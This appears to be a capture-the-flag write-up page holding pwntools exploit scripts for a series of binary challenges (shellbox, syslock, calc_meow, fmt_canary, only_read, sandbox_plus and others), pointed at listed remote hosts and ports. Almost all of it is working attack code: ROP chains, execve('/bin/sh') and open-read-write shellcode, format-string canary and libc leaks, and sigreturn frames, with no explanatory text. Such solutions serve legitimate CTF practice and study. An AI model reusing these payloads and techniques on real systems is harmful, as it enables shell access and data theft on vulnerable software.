0x13 shellbox 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 52443 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() pop_rax_ret = 0x44bbbb pop_rdi_ret = 0x401a40 pop_rsi_ret = 0x401a42 pop_rdx_ret = 0x401a44 pop_rsp_ret = 0x4121a8 ret = 0x40101a syscall = 0x401268 pop_rdi_rbp_ret = 0x4025e1 mprotect = 0x443520 buf = 0x4ceb60 shellcode = asm(''' push 0x67616c66 mov rsi,rsp xor rdx,rdx mov rdi,0xffffff9c push 257 pop rax syscall mov rdi,rax mov rsi,rsp mov edx,0x100 xor eax,eax syscall mov edi,1 mov rsi,rsp push 1 pop rax syscall ''' )io.recvuntil(b'.' ) io.send(shellcode) io.recvuntil(b'>' ) payload = b'a' *4 + p32(1 ) io.send(payload) def rop (data ): io.recvuntil(b'>' ) io.send(data) rop(p64(pop_rdi_ret)) rop(p64(0x4ce000 )) rop(p64(pop_rsi_ret)) rop(p64(0x1000 )) rop(p64(pop_rdx_ret)) rop(p64(7 )) rop(p64(mprotect)) rop(p64(buf)) io.interactive()
0x14 strcheck 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 63625 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() sys_addr=0x401236 ret=0x40101a payload=b'meow' +b'\x00' *0x24 +p64(ret)+p64(sys_addr) io.recvuntil(b'say?' ) io.sendline(payload) io.recvuntil(b'it?' ) io.sendline(str (len (payload))) io.interactive()
0x15 syslock 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 51017 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() pop_rax_ret=0x401244 syscall=0x401230 pop_rdi_rsi_rdx_ret=0x401240 ret=0x40101a binsh=0x404084 io.recvuntil(b'mode\n' ) io.send(b'-32' ) io.recvuntil(b'password\n' ) payload=p32(59 )+b'/bin/sh\x00' io.send(payload) io.recvuntil(b'Mode.\n' ) payload=b'A' *0x48 +p64(pop_rax_ret)+p64(59 )+p64(pop_rdi_rsi_rdx_ret)+p64(binsh)+p64(0 )+p64(0 )+p64(syscall) io.send(payload) io.interactive()
0x16 xdulaker 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "127.0.0.1" port = 59912 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() menu = b'>' io.recvuntil(menu) io.sendline(b'1' ) io.recvuntil(b'0x' ) leak_addr = int (io.recv(12 ), 16 ) elf_base = leak_addr - 0x4010 log.success("elf_base --> " +hex (elf_base)) backdoor = elf_base + 0x1249 ret = elf_base + 0x0101a key = b'xdulaker' io.recvuntil(menu) io.sendline(b'2' ) io.send(key*8 ) io.recvuntil(menu) io.sendline(b'3' ) io.recvuntil(b'xdulaker' ) payload = b'a' *0x38 + p64(ret) + p64(backdoor) io.sendline(payload) io.interactive()
0x17 calc_beta 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6_2.27-3ubuntu1.6_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "39.106.48.123" port = 23011 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/libc6-dbg_2.27-3ubuntu1.6_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.27-3ubuntu1.6/amd64/glibc-source_2.27-3ubuntu1.6_all/usr/src/glibc/glibc-2.27 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() def show (): io.recvuntil(b'5. Exit' ) io.recvuntil(b'> ' ) io.sendline(b'1' ) def edit (idx, data ): io.recvuntil(b'5. Exit' ) io.recvuntil(b'> ' ) io.sendline(b'2' ) io.recvuntil(b'Which number?' ) io.recvuntil(b'> ' ) io.sendline(str (idx).encode()) io.recvuntil(b'Change to what?' ) io.recvuntil(b'> ' ) io.sendline(str (data).encode()) pop_rdi_ret = 0x401253 pop_rsi_r15_ret = 0x401251 ret = pop_rdi_ret + 1 write_plt = elf.plt['write' ] write_got = elf.got['write' ] main = 0x4010b4 + 1 edit(1 , 0x40124A ) edit(2 , 0 ) edit(3 , 1 ) edit(4 , write_got) edit(5 , 1 ) edit(6 , write_got) edit(7 , 0x100 ) edit(8 , 0x401230 ) edit(9 , 0 ) edit(10 , 0 ) edit(11 , 0 ) edit(12 , 0 ) edit(13 , 0 ) edit(14 , 0 ) edit(15 , 0 ) edit(16 , main) edit(0 , ret) leak_addr = u64(io.recv(6 ).ljust(0x8 , b'\x00' )) log.info("leak_addr --> " +hex (leak_addr)) libc_base = leak_addr - libc.sym['write' ] log.info("libc_base --> " +hex (libc_base)) system = libc_base + libc.sym['system' ] binsh = libc_base + next (libc.search(b'/bin/sh' )) edit(1 , pop_rdi_ret) edit(2 , binsh) edit(3 , system) edit(0 , ret) io.interactive()
0x18 calc_meow 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "8.147.132.32" port = 21281 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() def show (): io.recvuntil(b'>' ) io.sendline(b'1' ) def edit (idx, data ): io.recvuntil(b'>' ) io.sendline(b'2' ) io.recvuntil(b'>' ) io.sendline(str (idx).encode()) io.recvuntil(b'>' ) io.sendline(str (data).encode()) def clean (): io.recvuntil(b'>' ) io.sendline(b'3' ) def go_calc (): io.recvuntil(b'>' ) io.sendline(b'4' ) def add (idx1, idx2, res_idx ): io.recvuntil(b'>' ) io.sendline(b'1' ) io.recvuntil(b'>' ) io.sendline(str (idx1).encode()) io.recvuntil(b'>' ) io.sendline(str (idx2).encode()) io.recvuntil(b'>' ) io.sendline(str (res_idx).encode()) def sub (idx1, idx2, res_idx ): io.recvuntil(b'>' ) io.sendline(b'2' ) io.recvuntil(b'>' ) io.sendline(str (idx1).encode()) io.recvuntil(b'>' ) io.sendline(str (idx2).encode()) io.recvuntil(b'>' ) io.sendline(str (res_idx).encode()) def exit_calc (): io.recvuntil(b'>' ) io.sendline(b'6' ) def ret (): io.recvuntil(b'>' ) io.sendline(b'5' ) base = 0x555555555cda - 0x555555554000 pop_rdi_nop_ret = 0x1d11 ret = pop_rdi_nop_ret + 2 puts_plt = elf.plt['puts' ] puts_got = elf.got['puts' ] log.info("puts_plt --> " +hex (puts_plt)) log.info("puts_got --> " +hex (puts_got)) main = 0x1be5 start = 0x1160 edit(1 , pop_rdi_nop_ret - base) edit(2 , puts_got - base) edit(3 , puts_plt - base) edit(4 , start - base) edit(5 , ret - base) go_calc() add(0 , 1 , 1 ) add(0 , 2 , 2 ) add(0 , 3 , 3 ) add(0 , 4 , 4 ) add(0 , 5 , 0 ) exit_calc() leak_addr = u64(io.recvuntil(b'\x0a' )[-7 :-1 ].ljust(0x8 , b'\x00' )) log.info("leak_addr --> " +hex (leak_addr)) libc_base = leak_addr - libc.sym['puts' ] log.info("libc_base --> " +hex (libc_base)) pop_rdi_ret = libc_base + 0x2a3e5 ret = pop_rdi_ret + 1 system = libc_base + libc.sym['system' ] binsh = libc_base + next (libc.search('/bin/sh' )) edit(1 , pop_rdi_ret) edit(2 , binsh) edit(3 , system) edit(0 , ret) io.interactive()
0x19 计算喵的复仇 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "39.106.57.152" port = 20934 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() def show (): io.recvuntil(b'>' ) io.sendline(b'1' ) def edit (idx, data ): io.recvuntil(b'>' ) io.sendline(b'2' ) io.recvuntil(b'>' ) io.sendline(str (idx).encode()) io.recvuntil(b'>' ) io.sendline(str (data).encode()) def clean (): io.recvuntil(b'>' ) io.sendline(b'3' ) def go_calc (): io.recvuntil(b'>' ) io.sendline(b'4' ) def add (idx1, idx2, res_idx ): io.recvuntil(b'>' ) io.sendline(b'1' ) io.recvuntil(b'>' ) io.sendline(str (idx1).encode()) io.recvuntil(b'>' ) io.sendline(str (idx2).encode()) io.recvuntil(b'>' ) io.sendline(str (res_idx).encode()) def sub (idx1, idx2, res_idx ): io.recvuntil(b'>' ) io.sendline(b'2' ) io.recvuntil(b'>' ) io.sendline(str (idx1).encode()) io.recvuntil(b'>' ) io.sendline(str (idx2).encode()) io.recvuntil(b'>' ) io.sendline(str (res_idx).encode()) def exit_calc (): io.recvuntil(b'>' ) io.sendline(b'6' ) def ret (): io.recvuntil(b'>' ) io.sendline(b'5' ) base = 0x555555555e53 - 0x555555554000 pop_rdi_nop_ret = 0x1e8a pop_rbp_ret = 0x1233 ret = pop_rdi_nop_ret + 2 puts_plt = elf.plt['puts' ] puts_got = elf.got['puts' ] log.info("puts_plt --> " +hex (puts_plt)) log.info("puts_got --> " +hex (puts_got)) main = 0x1d5e start = 0x1160 magic_puts = 0x1e75 call_read = 0x12db calc = 0x1cb2 edit_num = 0x14d5 go_calc() add(0 , 1 , 1 ) exit_calc() show() io.recvuntil(b'num1 = ' ) leak_addr = int (io.recv(15 ), 10 ) elf_base = leak_addr - 0x1e53 log.info("elf_base --> " +hex (elf_base)) edit(0 , elf_base + call_read) payload = b'a' *0x8 + p64(elf_base + ret) + p64(elf_base + pop_rdi_nop_ret) +\ p64(elf_base + puts_got) + p64(elf_base + puts_plt) + p64(elf_base + call_read) io.send(payload) leak_addr = u64(io.recvuntil(b'\x0a' )[-7 :-1 ].ljust(0x8 , b'\x00' )) log.info("leak_addr --> " +hex (leak_addr)) libc_base = leak_addr - libc.sym['puts' ] log.info("libc_base --> " +hex (libc_base)) pop_rdi_ret = libc_base + 0x2a3e5 ret = pop_rdi_ret + 1 system = libc_base + libc.sym['system' ] binsh = libc_base + next (libc.search('/bin/sh' )) payload = b'a' *0x28 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) io.send(payload) io.interactive()
0x1a fmt_canary 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "8.147.132.32" port = 16586 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() payload = b'%11$p%33$p' io.sendline(payload) io.recvuntil(b'0x' ) canary = int (io.recv(16 ), 16 ) io.recvuntil(b'0x' ) leak_addr = int (io.recv(12 ), 16 ) libc_base = leak_addr - 128 - libc.sym['__libc_start_main' ] log.info("libc_base --> " +hex (libc_base)) log.info("canary --> " +hex (canary)) system = libc_base + libc.sym['system' ] binsh = libc_base + next (libc.search('/bin/sh' )) pop_rdi_ret = libc_base + 0x2a3e5 ret = pop_rdi_ret + 1 io.sendline(b'end' ) payload = b'a' *0x28 + p64(canary)*2 + p64(pop_rdi_ret) + p64(binsh) + p64(ret) + p64(system) io.sendline(payload) io.interactive()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "39.106.48.123" port = 13668 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() shellcode = asm(''' xor rsi, rsi push rsi mov rdi, 0x68732f2f6e69622f push rdi push rsp pop rdi mov al, 59 cdq syscall ''' )io.send(shellcode) io.interactive()
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "47.94.87.199" port = 22770 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() shellcode = asm(''' push rsi mov rdi, 0x68732f2f6e69622f push rdi push rsp pop rdi mov al, 59 cdq syscall ''' )io.send(shellcode) io.interactive()
0x1d int_bug 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "8.147.132.32" port = 19832 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() for _ in range (0x7fff ): io.sendline(b'1' ) io.sendline(b'1' ) io.interactive()
0x1e noshell 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "47.94.87.199" port = 24869 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() pop_rdi_ret = 0x4013f3 pop_rsi_ret = 0x4013f5 pop_rdx_ret = 0x4013f7 ret = 0x40101a open_addr = elf.plt['open' ] write_addr = elf.plt['write' ] read_addr = elf.plt['read' ] rw = 0x404800 flag = 0x40206a payload = b'a' *0x28 + p64(pop_rdi_ret) + p64(flag) + p64(pop_rsi_ret) + p64(0 ) + p64(open_addr) +\ p64(pop_rdi_ret) + p64(5 ) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100 ) + p64(read_addr) +\ p64(pop_rdi_ret) + p64(1 ) + p64(pop_rsi_ret) + p64(rw) + p64(pop_rdx_ret) + p64(0x100 ) + p64(write_addr) io.recvuntil(b'something?' ) io.sendline(b'n' ) io.recvuntil(b'flag?' ) io.sendline(b'2' ) io.recvuntil(b'choice:' ) io.sendline(b'2' ) io.recvuntil(b'choice:' ) io.sendline(b'1' ) io.recvuntil(b'something' ) io.send(payload.ljust(0x100 , b'\x00' )) io.interactive()
0x1f only_read 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "8.147.132.32" port = 25201 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b vuln set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() sigret = 0x401366 syscall_ret = 0x40136d main = 0x401373 rw = 0x404000 leave_ret = 0x401360 call_read = 0x401349 sigFrame = SigreturnFrame() sigFrame.rax = 2 sigFrame.rdi = rw + 0x800 + 0x10 sigFrame.rsi = 0 sigFrame.rdx = 0 sigFrame.rip = syscall_ret sigFrame.rsp = rw + 0x800 - 0x10 sigFrame.rbp = rw + 0x600 log.info("frame len --> " +hex (len (sigFrame))) log.info("sigframe --> " +hexdump(sigFrame)) payload = b'a' *0x10 + p64(rw + 0x800 ) + p64(call_read) io.send(payload.ljust(0x100 , b'\x00' )) payload = p64(call_read) + p64(sigret) + p64(rw + 0x800 - 0x10 ) + p64(leave_ret) + b'./flag\x00\x00' + bytes (sigFrame)[0x18 :-0x8 ] io.send(payload.ljust(0x100 , b'\x00' )) sigFrame = SigreturnFrame() sigFrame.rax = 40 sigFrame.rdi = 1 sigFrame.rsi = 3 sigFrame.rdx = 0 sigFrame.r10 = 0x100 sigFrame.rip = syscall_ret log.info("frame len --> " +hex (len (sigFrame))) log.info("sigframe --> " +hexdump(sigFrame)) payload = p64(rw) + p64(sigret) + p64(rw + 0x600 - 0x10 ) + p64(leave_ret) + bytes (sigFrame)[0x10 :-0x8 ] io.send(payload.ljust(0x100 , b'\x00' )) io.interactive()
0x20 overflow 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "8.147.132.32" port = 39380 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() payload = b'a' *0x100 + p64(0xdeadbeef ) + p64(0x401222 ) io.sendline(payload) io.interactive()
0x21 pwndoor 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6_2.35-0ubuntu3.10_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "8.147.132.32" port = 42958 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b main set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/libc6-dbg_2.35-0ubuntu3.10_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.10/amd64/glibc-source_2.35-0ubuntu3.10_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() io.sendline(b'7038329' ) io.interactive()
0x22 sandbox_plus 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 from pwn import *context(os='linux' , arch='amd64' , log_level='debug' ) filename = "pwn_patched" libcname = "/home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6_2.35-0ubuntu3.11_amd64/lib/x86_64-linux-gnu/libc.so.6" host = "39.106.48.123" port = 22398 elf = context.binary = ELF(filename) if libcname: libc = ELF(libcname) gs = ''' b *$rebase(0x139a) set debug-file-directory /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/libc6-dbg_2.35-0ubuntu3.11_amd64/usr/lib/debug set directories /home/r3t2/.config/cpwn/pkgs/2.35-0ubuntu3.11/amd64/glibc-source_2.35-0ubuntu3.11_all/usr/src/glibc/glibc-2.35 ''' def start (): if args.P: return process(elf.path) elif args.R: return remote(host, port) else : return gdb.debug(elf.path, gdbscript = gs) io = start() shellcode = asm(''' mov rdi, -100 push 0x0000000067616c66 mov rsi, rsp xor rdx, rdx xor r10, r10 push 257 pop rax syscall push rax pop rdi sub rsp, 0x100 push rsp pop rsi push 0x100 pop rdx xor r10, r10 push 17 pop rax syscall push 1 pop rdi mov rsi, rsp push 0x100 push rsi mov rsi, rsp push 1 pop rdx push 20 pop rax syscall nop nop nop ''' )io.recvuntil(b'please input a orw_plus function (also also after compile)' ) io.send(shellcode) io.interactive()
